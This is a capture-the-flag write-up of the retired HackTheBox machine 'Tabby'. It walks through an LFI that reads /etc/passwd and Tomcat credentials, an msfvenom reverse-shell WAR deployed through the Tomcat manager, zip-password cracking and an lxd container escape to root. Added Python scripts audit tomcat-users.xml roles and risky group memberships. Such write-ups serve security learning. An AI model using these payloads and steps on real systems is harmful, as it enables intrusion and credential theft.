Hackthebox - Tabby

Initial Enumeration

Nmap scan:

# Nmap 7.80 scan initiated Sun Aug  9 14:17:27 2020 as: nmap -sC -sV -oN nmap/tabby 10.10.10.194
Nmap scan report for 10.10.10.194
Host is up (0.082s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Mega Hosting
8080/tcp open http Apache Tomcat
|_http-title: Apache Tomcat
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Aug 9 14:17:39 2020 -- 1 IP address (1 host up) scanned in 12.07 seconds

Enumerating PORT: 80

Clicking around, we only find one other link, /news.php, which also seems to include a statement through its file parameter.

Possible LFI?

Testing for LFI, we see it is indeed vulnerable:

curl http://10.10.10.194/news.php?file=../../../../etc/passwd

which gives us the users on the box:

root
ash

After confirming the LFI, we need to think about what to include.

Since another port is open, let's look at that too.

Tomcat PORT: 8080

A few of the messages on the default page were very interesting, like:

tomcat9-admin: This package installs two web applications that can help managing this Tomcat instance. Once installed, you can access the manager web-app and the host-manager web-app.

This tells us an admin panel (Tomcat Manager) is running, but we need credentials for it.

We also see:

NOTE: For security reasons, using the manager webapp is restricted to users with role "manager-gui". The host-manager webapp is restricted to users with role "admin-gui". Users are defined in /etc/tomcat9/tomcat-users.xml.

This tells us about a file, tomcat-users.xml, which may contain credentials. But trying the /etc/tomcat9/tomcat-users.xml path through our LFI did not get us that file.

We know that Tomcat is running with CATALINA_HOME set to /usr/share/tomcat9, so maybe the file is in that folder?

Trying /usr/share/tomcat9/conf/tomcat-users.xml did not return anything, but since the page said users are defined in /etc/tomcat9/tomcat-users.xml, we can try /usr/share/tomcat9/etc/tomcat-users.xml.

With that path we can download the tomcat-users.xml file:

curl http://10.10.10.194/news.php?file=../../../../usr/share/tomcat9/etc/tomcat-users.xml > tomcat-users.xml

and it contains credentials:

<role rolename="admin-gui"/>
<role rolename="manager-script"/>
<user username="tomcat" password="$3cureP4s5w0rd123!" roles="admin-gui,manager-script"/>

Using those, we can log in to host-manager.

I created a malicious WAR file using msfvenom:

msfvenom -p java/shell_reverse_tcp lhost=10.10.X.X lport=9001 -f war -o pwn.war

But we don't see any option to upload a WAR. Going back to the Tomcat home page, we remember that the manager-gui role has been removed, which is why we cannot view the manager page.

But as we have the admin-gui role, maybe we can upload the WAR some other way. (The user also holds manager-script, and that role is what grants access to the text interface under /manager/text used below.)

A little Google-fu landed me on a Stack Overflow page:

curl -v -u tomcat:'$3cureP4s5w0rd123!' -T ./pwn.war 'http://10.10.10.194:8080/manager/text/deploy?path=/pwn'

Requesting http://10.10.10.194:8080/pwn with curl then gave me a shell as tomcat.
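Both weaknesses used above (a readable tomcat-users.xml and an account holding a deploy-capable role) can be checked for on the defending side. This is an added example, not code from the post: it parses a constructed copy of the file, reports every user holding a Manager/Host Manager role that allows deployment or configuration changes, and checks whether the file mode lets a stranger such as the web server read it. The placeholder passwords and the 0640 reference layout are assumptions.

```python
import os
import stat
import xml.etree.ElementTree as ET

# Roles that allow deploying code or changing configuration through the Manager and
# Host Manager apps; a holder of any of them is effectively root on this Tomcat.
PRIVILEGED_ROLES = {"manager-gui", "manager-script", "manager-jmx", "admin-gui", "admin-script"}

# Constructed copy of the file found above, wrapped in the root element Tomcat's real file uses.
SAMPLE_XML = """<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="admin-gui"/>
  <role rolename="manager-script"/>
  <role rolename="probe"/>
  <user username="tomcat" password="[placeholder]" roles="admin-gui,manager-script"/>
  <user username="monitor" password="[placeholder]" roles="probe"/>
</tomcat-users>
"""

def audit_tomcat_users(xml_text):
    """Map each user holding a privileged role to the sorted roles that grant it."""
    root = ET.fromstring(xml_text)
    findings = {}
    for el in root.iter():
        if el.tag.rsplit("}", 1)[-1] != "user":   # strip the namespace prefix, if any
            continue
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        held = sorted(roles & PRIVILEGED_ROLES)
        if held:
            findings[el.get("username") or el.get("name")] = held
    return findings

def world_readable(mode):
    """True when the permission bits grant read to 'other'. The Debian tomcat9 package
    ships tomcat-users.xml as root:tomcat 0640 (assumption about the reference layout);
    a copy readable by www-data, as on this box, fails this check."""
    return bool(mode & stat.S_IROTH)

def audit_file(path):
    """Run both checks against a file on disk: (findings, world_readable)."""
    with open(path, encoding="utf-8") as fh:
        findings = audit_tomcat_users(fh.read())
    return findings, world_readable(os.stat(path).st_mode)

if __name__ == "__main__":
    print(audit_tomcat_users(SAMPLE_XML))   # {'tomcat': ['admin-gui', 'manager-script']}
    print(world_readable(0o644), world_readable(0o640))   # True False
```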

Enumerating as user tomcat

Enumerating as the tomcat user, we find a backup zip in /var/www/html/files, so we download it and try to crack its password using fcrackzip:

fcrackzip -D  -p /usr/share/wordlists/rockyou.txt backup.zip
possible pw found: admin@it ()

which gives us the password admin@it.

Unzipping the archive, we don't see anything interesting.

Not seeing any other way forward, I also tried that password for the ash user on the box, which immediately gave me a shell as ash,

and with it the user flag: bcc6922fa15c76baaa1b845cc4d7d72c

Privilege Escalation

Running the id command:

ash@tabby:~$ id
uid=1000(ash) gid=1000(ash) groups=1000(ash),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)

we see we are part of an interesting group, lxd.

Googling around, I found an article on hackingarticles.in.

Following the article, we can get root.

Building the LXC Alpine image:

git clone  https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
sudo ./build-alpine

This generates a file named alpine*.tar.gz.

I renamed it to alpine.tar.gz for ease of typing later. It is then served from the attacking machine, and the following commands are run on the box as ash:

mkdir -p /tmp/.f3v3r
cd /tmp/.f3v3r/
wget http://10.10.X.X/alpine.tar.gz
lxc image import ./alpine.tar.gz --alias f3v3r
lxc init f3v3r ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
chroot /mnt/root

From inside the chroot we can grab root.txt: 8f2c3651a5fd656ea4dd5ae1922ddcdd
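The root cause here is group membership, and it is cheap to audit. The following is an added example (not from the post): it computes each account's effective groups from constructed /etc/passwd and /etc/group contents and reports non-root users sitting in groups that are root-equivalent on a default Ubuntu install; the ROOT_EQUIVALENT list and the sample entries are assumptions modelled on the id output above.

```python
from collections import defaultdict

# Groups whose membership is root-equivalent on a default Ubuntu host (assumption: no extra hardening).
# lxd is included because a member can launch a privileged container that mounts the host filesystem,
# which is exactly how this box falls.
ROOT_EQUIVALENT = {"sudo", "wheel", "admin", "lxd", "docker", "disk"}

# Constructed sample data reflecting the accounts seen on the box.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
tomcat:x:997:997::/var/lib/tomcat:/usr/sbin/nologin
ash:x:1000:1000:ash:/home/ash:/bin/bash
"""
SAMPLE_GROUP = """root:x:0:
adm:x:4:syslog,ash
sudo:x:27:
lxd:x:116:ash
tomcat:x:997:
ash:x:1000:
"""

def parse_passwd(text):
    """Return {user: (uid, primary_gid)} from /etc/passwd-style text."""
    out = {}
    for line in text.splitlines():
        if line and not line.startswith("#"):
            name, _, uid, gid, *_ = line.split(":")
            out[name] = (int(uid), int(gid))
    return out

def parse_group(text):
    """Return {gid: (group_name, set(supplementary_members))} from /etc/group-style text."""
    out = {}
    for line in text.splitlines():
        if line and not line.startswith("#"):
            name, _, gid, members = line.split(":", 3)
            out[int(gid)] = (name, {m for m in members.split(",") if m})
    return out

def effective_groups(passwd_text, group_text):
    """Primary group plus every supplementary group, per user."""
    groups = parse_group(group_text)
    eff = defaultdict(set)
    for user, (_, gid) in parse_passwd(passwd_text).items():
        if gid in groups:
            eff[user].add(groups[gid][0])
    for gname, members in groups.values():
        for m in members:
            eff[m].add(gname)
    return dict(eff)

def root_equivalent_members(passwd_text, group_text):
    """Non-root users whose groups make them root-equivalent -> sorted list of those groups."""
    users = parse_passwd(passwd_text)
    return {u: sorted(g & ROOT_EQUIVALENT)
            for u, g in effective_groups(passwd_text, group_text).items()
            if users.get(u, (1, 1))[0] != 0 and g & ROOT_EQUIVALENT}

if __name__ == "__main__":
    print(root_equivalent_members(SAMPLE_PASSWD, SAMPLE_GROUP))   # {'ash': ['lxd']}
```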

and we have pwned Tabby 💃

Author: Shubham Kumar
Link: https://f3v3r.in/htb/machines/retired/tabby/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.